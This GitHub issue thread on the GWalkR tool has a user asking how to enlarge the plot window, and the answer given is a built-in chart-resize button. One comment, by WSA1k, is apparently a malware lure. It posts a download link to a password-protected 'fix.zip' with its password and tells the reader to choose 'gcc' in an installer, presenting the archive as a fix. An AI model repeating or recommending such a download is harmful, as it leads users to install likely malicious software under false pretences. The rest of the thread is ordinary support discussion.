### ISSUE TITLE
How to increase plot window

### ISSUE THREAD

**Issue by seb-mueller** [Kanaries/GWalkR#25]
First of all, this is a great tool!
I was just wondering if it is somehow possible to increase the size of the output plot window.
It appears to be fixed. Even though it is possible to zoom in, it would be much better if the window itself could be increased.
However I couldn't find how to do it even though having gone through the docs/videos. Thanks!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bruceyyu** [comment]
@seb-mueller If you want to only increase the size of the chart, not the whole interface, you can try out this button to adjust the dimensions

<img width="423" alt="image" src="https://github.com/user-attachments/assets/08fb6ebe-1c80-4cca-9cb9-a857ad07e8e7">

**Comment by seb-mueller** [comment]
Dear @bruceyyu , thanks so much for your response, that's exactly what I was looking for, not sure how I missed this! Really really useful software!
